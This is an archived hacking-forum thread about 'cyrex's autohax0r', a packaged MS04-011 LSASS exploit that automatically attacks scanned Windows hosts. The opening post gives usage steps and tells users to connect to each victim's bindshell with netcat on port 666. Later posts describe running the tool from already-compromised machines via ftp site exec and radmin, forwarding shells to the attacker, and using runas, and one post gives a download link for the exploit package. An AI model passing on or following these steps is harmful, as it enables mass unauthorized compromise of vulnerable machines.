Full Version: Remote Lsass Cyrex's Autohax0r...
| CODE |
====================================== | | | MS04011 Lsasrv.dll RPC Auto Hacker | | (c) 2004 by cyrex | | ENJOY! | \\__ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ __/ This Auto Hacker is not for any Abuse Action ;) all rights provided by cyrex.. you know the rest of shit.. Steps: 1. Which Files does the auto hacker contain 2. What shit is what ? 3. How to use? 4. Contact 5. !!!!! FAQ !!!! --------------------------------------------------- 1. check.exe root.exe lsass.exe 2 && 3 . check.exe: This Programm will check the results of scan.txt from scan100,500,1000.exe. We start the Programm with the follow arguments c:\> check.exe scan.txt -t Later if its finished a new text files is created name is checked.txt the information in this txt file is something like this. Windows 5.0 127.0.0.1 Windows 5.1 192.168.1.3 Wee see the first ip is Win2k and the second WinXP its time to use root.exe root.exe: This programm is our Auto Hacker;) please DONT DELETE checked.txt this file is required for root.exe else it wont work or dont modify the file just start only root.exe without any parameter C:\lsass>root ====================================== | | | MS04011 Lsasrv.dll RPC Auto Hacker | | (c) 2004 by cyrex | | ENJOY! | \__ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ __/ [*] Creating Auto Hacking File... [*] Finished.. [*] Sleeping a while .... The programm creates a temp file which is needed for root.exe the Auto Hacker use Generel a BINDSHELL so if its stoping at Attacking..OK like 3 - 4 seconds try to netcat to the ip and the port 666 nc IP 666 !!! <- IMPORTANT if you connect to the server with nc ! the autohacker exploit the next target;) and you open a new netcat and connect again again lsass.exe: This programm is the mainly program;) but modified by cyrex extra for the autohacker.. for more infos try only to start lsass.exe 4. try to find me, my name is cyrex GREETZ to kids who use this pack and greetz to my friends 5. FAQ PLEASE READ FOR WIN2k USERS ONLY Q: Why i cant run it over Windows 200? A: if you want to use this root.exe , too just create a directory called c:\WINDOWS\system32 and put in cmd.exe |
Well, i love this autohax0r but, how can i use it on a remote box without passing by radmin viewer or vnc (too lame) ?? Coz when i start check scan.txt -t in a netcat shell, i don t have a answer in the shell, but the exe file is loaded in process, but it doesn t create any checked.txt
Does anyone can help me to exploit and autohax by this autohaxor on a remote box and via shell ?
Thx a lot for all answer and advertises
lsass is dead sasser and all the other lsass worms killed it.
not dead for me, have still mass result in LAN scan
but could U help me plz ?
but could U help me plz ?
You know, It kind of hurts me everytime someone says an exploit is dead.
Exploits don't die. Sometimes ISP's will block that port over the internet, but
that doesn't mean there arn't machines still vulnerable to it. Besides that, the lsass
overflow is a RPC exploit, and I'm surprised netbios and the like was ever allowed
over the public internet.
Exploits like this are just as valueble now as they were when you saw the first
post on Bugtraq.... there are still just as many machines out there to exploit with
this. So what if you can't get SYSTEM on personal computers over the internet now?
It wasn't a server exploit anyway, it's not meant to be!
I still find about 1/2 of the machines scanned during penetration tests on corporate
networks to be vulnerable to the old MS03-026 RPC DCOM Buffer Overflow. About
3/4 with lsass. If this kind of a script isn't a good way to demonstrate poor security
practices, I don't know what is.
Sorry for my rambling it's 1:30 am here and I've been sick all week.... just my
$0.02
FYI - I don't endorse script kiddies (whice cyrex is obviosly king of) but if you post
the files I may be able to help you with the nc shell issue, since that's more
universal than "how can i use this to pwn everyone on my subnet?"
And no, by "this kind of a script" I'm not refering to autohackers, just exploits ....
(although automated pen-tests like those in CORE IMPACT do indeed make life
a little easier...)
Sorry for harshness of this post :/
Exploits don't die. Sometimes ISP's will block that port over the internet, but
that doesn't mean there arn't machines still vulnerable to it. Besides that, the lsass
overflow is a RPC exploit, and I'm surprised netbios and the like was ever allowed
over the public internet.
Exploits like this are just as valueble now as they were when you saw the first
post on Bugtraq.... there are still just as many machines out there to exploit with
this. So what if you can't get SYSTEM on personal computers over the internet now?
It wasn't a server exploit anyway, it's not meant to be!
I still find about 1/2 of the machines scanned during penetration tests on corporate
networks to be vulnerable to the old MS03-026 RPC DCOM Buffer Overflow. About
3/4 with lsass. If this kind of a script isn't a good way to demonstrate poor security
practices, I don't know what is.
Sorry for my rambling it's 1:30 am here and I've been sick all week.... just my
$0.02
FYI - I don't endorse script kiddies (whice cyrex is obviosly king of) but if you post
the files I may be able to help you with the nc shell issue, since that's more
universal than "how can i use this to pwn everyone on my subnet?"
And no, by "this kind of a script" I'm not refering to autohackers, just exploits ....
(although automated pen-tests like those in CORE IMPACT do indeed make life
a little easier...)
Sorry for harshness of this post :/
why dont you just write your own script
i made a simple one for the hod sploit and it still gets results on internal scans
basically i execute the scan command via ftp site exec and when its done i execute the autohack batch file from radmin`s telnet
it works great and all shells are forwarded to my ip
however you will get more results running it from the desktop on the remote machine and having the shells connect back there
i made a simple one for the hod sploit and it still gets results on internal scans
basically i execute the scan command via ftp site exec and when its done i execute the autohack batch file from radmin`s telnet
it works great and all shells are forwarded to my ip
however you will get more results running it from the desktop on the remote machine and having the shells connect back there
The program probably wont run under SYSTEM level so you need to execute it as a user with a proper user profile. You can do this with runas.
runas /user:Administrator [program]
Or better still, modify the service properties which cmd.exe is running under. Serv-U? Change the logon profile to a vaild user on the box.
runas /user:Administrator [program]
Or better still, modify the service properties which cmd.exe is running under. Serv-U? Change the logon profile to a vaild user on the box.
Does Y have a bond to test the tools?
yep,
Where is the tool ?? XeLoRy
Where is the tool ?? XeLoRy
would be great if someone could serve the check.exe ... didn't found it yet !
thank's.... although lsass is dead, maybe will usefull next day....
it's kinda unusefull tool, most the fast server's are pacthed from this hole, so this tool can be help us.
but tnx any way dude, noce tool.
but tnx any way dude, noce tool.
its not DEAD!!! try to scan a lan on a uni, you'll get plenty of results.
| QUOTE (ShouiZen @ Jul 3 2004, 03:41 PM) |
| yep, Where is the tool ?? XeLoRy |
check the topic on the forum, i cant post it a seconde time coz it s still available on the forum, try search engine on...
Does anybody have a link to download?
maybe a littly late but found it on google:
| CODE |
http://ns2.elhacker.net/rojodos/exploits/aut0r00ter_final.rar |
Wierd ... I d/l'd this yesterday to give it a go since lsass is definately not dead ... when I tried the check.exe <filename> -t command I get this error
===============================================
MS04011 Lsasrv.dll RPC OS Checker v1.1 by cyrex
===============================================
[-] gethostbyname : Operation not permitted
Anyone else run into this one?
===============================================
MS04011 Lsasrv.dll RPC OS Checker v1.1 by cyrex
===============================================
[-] gethostbyname : Operation not permitted
Anyone else run into this one?
Problem solved, I removed the cygwin dlls that are installed with the stripped down metasploit cyg, and removed all extra text from the scan.txt file created by scan500.
| QUOTE (maydje @ Sep 16 2004, 01:48 PM) |
| [-] gethostbyname : Operation not permitted |
A possible WinXP SP2 issue perhaps? Ah, never mnd, i just saw your reply. Enjoy.
Yeah, just to add to that incase anyone else has that problem.
I only get that when there is other words in the scan.txt file. The scan.txt file needs to be just ip's.
Hope that clarifies
I only get that when there is other words in the scan.txt file. The scan.txt file needs to be just ip's.
Hope that clarifies
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
